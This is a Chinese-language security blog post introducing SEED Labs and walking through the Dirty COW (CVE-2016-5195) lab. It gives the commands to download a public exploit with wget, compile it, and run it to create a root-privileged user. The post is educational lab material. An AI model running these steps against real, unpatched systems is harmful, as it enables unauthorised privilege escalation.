iT邦幫忙

第 12 屆 iThome 鐵人賽

DAY 26
1
Security

漏洞挖起來系列 第 26

[Day26]用SEED來體驗漏洞吧

  • 分享至 

  • xImage
  •  

講完漏洞賽制、實體密室逃脫之後,還有什麼可以實際玩看看漏洞呢?
另外想跟大家分享的是可以實作的靶機:SEED

不是這個SEED

SEED LABS

https://ithelp.ithome.com.tw/upload/images/20201010/201036470hBSI0I8eP.png
SEED 是雪城大學所開放的實驗環境,主要以實作來驗證相關資訊安全的漏洞。
https://seedsecuritylabs.org/index.html

線上有開源的實驗環境可以下載:https://seedsecuritylabs.org/Labs_16.04/
也有相關漏洞驗證的線上課程及書籍,不過課程及參考書大部份都是另外付費的。

SEED LABS 提供以下六大領域可以實作:

軟體安全實驗室

這些實驗室涵蓋了通用程式中的一些最常見漏洞。

網路安全實驗室

涵蓋了有關網路安全的主題,從對TCP/IP、DNS的攻擊到各種網路安全技術(防火牆,VPN和IPSec)。

網路安全實驗室

涵蓋了Web應用程序中的一些最常見漏洞。這些實驗室向學生展示了攻擊如何利用這些漏洞。

系統安全實驗室

涵蓋了系統和硬體中的攻擊和安全機制,包括最近發現的對CPU的Meltdown和Spetre攻擊。

密碼學實驗室

涵蓋了密碼學中的三個基本概念,包括秘密密鑰加密、單向哈希函數以及公共密鑰加密和PKI。

移動安全實驗室

專注於手機的安全性,涵蓋了最常見的漏洞和對移動設備的攻擊。這些實驗提供了一個Android VM。

官方資源

https://www.handsonsecurity.net/resources.html

再來要來講個 Dirty COW Attack Lab…

Dirty COW Attack Lab

臟牛(Dirty Cow)是Linux內核的一個提權漏洞,即髒寫入時複製(英語:Dirty copy-on-write)。
攻擊者可以利用這個漏洞為一般使用者卻能寫入root權限。
因為這個漏洞利用了Linux的copy-on-write機制。
CVE:CVE-2016-5195。

所以我們可以利用這個 CVE 來做提權。

確認環境及版本

https://github.com/dirtycow/dirtycow.github.io/wiki/Patched-Kernel-Versions
Check your kernel version with uname -r

  • Ubuntu
    4.8.0-26.28 for Ubuntu 16.10
    4.4.0-45.66 for Ubuntu 16.04 LTS
    3.13.0-100.147 for Ubuntu 14.04 LTS
    3.2.0-113.155 for Ubuntu 12.04 LTS

  • Debian
    3.16.36-1+deb8u2 for Debian 8
    3.2.82-1 for Debian 7
    4.7.8-1 for Debian unstable

獲取檔案

wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
https://ithelp.ithome.com.tw/upload/images/20201027/20103647z5FpucKkaH.png

編譯

gcc -pthread dirty.c -o dirty -lcrypt
https://ithelp.ithome.com.tw/upload/images/20201027/20103647aPs8zWPDDk.png

https://ithelp.ithome.com.tw/upload/images/20201027/20103647JzuJWx2lJT.png

提權

./dirty
執行及比較 etc/passwd 中的內容。
https://ithelp.ithome.com.tw/upload/images/20201027/20103647kikzbjWvBC.png

影響

已建立新使用者,並擁有 root 權限。
https://ithelp.ithome.com.tw/upload/images/20201027/20103647EflhS43vcK.png


上一篇
[Day25]資安新知之實作利用
下一篇
[Day27]快快樂樂一起打靶機
系列文
漏洞挖起來31
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言